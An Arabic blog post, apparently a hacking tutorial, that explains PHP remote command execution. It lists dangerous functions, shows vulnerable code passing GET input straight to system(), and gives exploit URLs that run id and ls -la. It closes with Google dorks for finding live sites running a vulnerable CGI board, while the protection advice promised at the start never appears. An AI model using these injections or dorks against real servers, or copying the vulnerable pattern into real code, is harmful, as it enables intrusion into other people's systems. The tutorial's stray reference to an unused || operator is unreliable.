خفايا الأنترنت  خفايا الأنترنت

آخر الأخبار

جاري التحميل ...

Remote Command Execution

السلام عليكم:

اليوم نشرح لكم ثغرة RCE التي تكون في لغة PHP سنشرح لكم أوامر الثغرة و

تطبيقها على رابط الإستغلال بي طريقتين وكيف تحمي موقعك أو إذا كان عندك 

سايفر

خاص بك تستضيف به مواقع سنعطيك الحل لي حماية سايفرك من هذه الثغرة نهائياَ

خطورة ثغرة RCE:

ثغرة  Remot Command Execution تعتبر من 2 أخطر ثغرات بعد ثغرة RFI 

تسمح لك ثغرة  Remot Command Execution بي تنفيذ أوامر مباشرة لي السيرفر

وهذه بعض الدوال التي تسبب ثغرة Remot Command Execution

 


 exec
passthru
shell_exec
system

هام:

إذا كان الإستغلال يتم عبر تطبيق الأوامر بدالة EXEC() فانه لا بمكنك مشاهدة نتيجة

الأوامر (واكن يتم تنفيذ الأوامر ) يعني بي المعنة الصرح لا تطبع النتائج على صفحة الويب

1-مثال عن كود الثغرة :

مقتطف من ملف test.php


<?php
$cmd=$_GET['cmd'];
system($cmd);
?>

من خلال دراسة الثغرة السابقة عرفنا كيف يمكننا طلب قيمة للمتغير وهو في هذه 

الحالة cmd$

ومنه يمكننا أن نجعل الإستغلال يتم كالأتي :

http://127.0.0.1/test.php?cmd=id

وسيتم تنفيذ الأمر id (أمر عرض صلاحياتنا على السيرفر) وسيتم طبع النتيجة على 

صفحة الويب 

وفي حالة التجريب على السيرفر المحلي سيكون الأمر من أوامر النضام ويندوز كأمر dir (إستعراض الملفات المجلد الحالي).

2-مثال متقدم عن كود الثغرة :

مثال من سكربت والملف يسمى : dig.php

-مقتطف من الكود المصاب : 


$ns = $_GET['ns'];
$query_type = $_GET['query_type']; // ANY, MX, A , etc.
$ip = $_SERVER['REMOTE_ADDR'];
$self = $_SERVER['PHP_SELF'];
........................ etc ........................
$host = strtolower($host);
echo("<span class=\"plainBlue\"><b>Executing : <u>dig $ns </u></b><br>");
echo '<pre>';
system ("$ns");

 هنا يظهر أنه يمكن للمهاجم أن يوجه أي أمر يريده من خلال المتغير $ns

 والأمر سيوجه بالشكل التالي : 

http://127.0.0.1/dig.php?ns=ls -la

لأن الرمز || يستخدم لتطبيق عدة أوامر في وقت واحد .


Google Dork 1 : inurl:/cgi-bin/technote/
Google Dork 2 : inurl:".cgi?board=FREE_BOARD"
Google Dork 3 : intext:"TECHNOTE-TOP"


عن الكاتب

#king_haker dz صهيب ناصري مدون جزائري أبلغ من العمر 21 سنة أحب مشاركة أفكاري على الانترنت متخصص في مجال التقنية و أمن المعلومات أهدف الى إثراء المحتوى العربي بالمحتوى الحصري فقط!

التعليقات


اتصل بنا

إذا أعجبك محتوى مدونتنا نتمنى البقاء على تواصل دائم ، فقط قم بإدخال بريدك الإلكتروني للإشتراك في بريد المدونة السريع ليصلك جديد المدونة أولاً بأول ، كما يمكنك إرسال رساله بالضغط على الزر المجاور ...

جميع الحقوق محفوظة

خفايا الأنترنت

كل عام والأمة الأسلامية بخير

رمضان كريم